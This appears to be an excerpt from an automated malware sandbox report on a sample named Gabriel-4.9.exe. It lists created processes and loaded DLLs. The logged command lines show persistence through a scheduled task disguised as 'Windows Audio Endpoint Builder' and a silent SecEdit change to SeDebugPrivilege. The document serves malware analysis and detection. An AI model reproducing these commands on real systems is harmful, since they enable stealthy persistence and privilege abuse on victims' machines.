Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml

Source: C:\Users\user\Desktop\Gabriel-4.9.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gabriel-4.9.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gabriel-4.9.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gabriel-4.9.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gabriel-4.9.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gabriel-4.9.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gabriel-4.9.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gabriel-4.9.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gabriel-4.9.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gabriel-4.9.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gabriel-4.9.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gabriel-4.9.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gabriel-4.9.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gabriel-4.9.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gabriel-4.9.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gabriel-4.9.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gabriel-4.9.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gabriel-4.9.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gabriel-4.9.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gabriel-4.9.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gabriel-4.9.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gabriel-4.9.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gabriel-4.9.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gabriel-4.9.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gabriel-4.9.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: lua5.1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: actxprxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
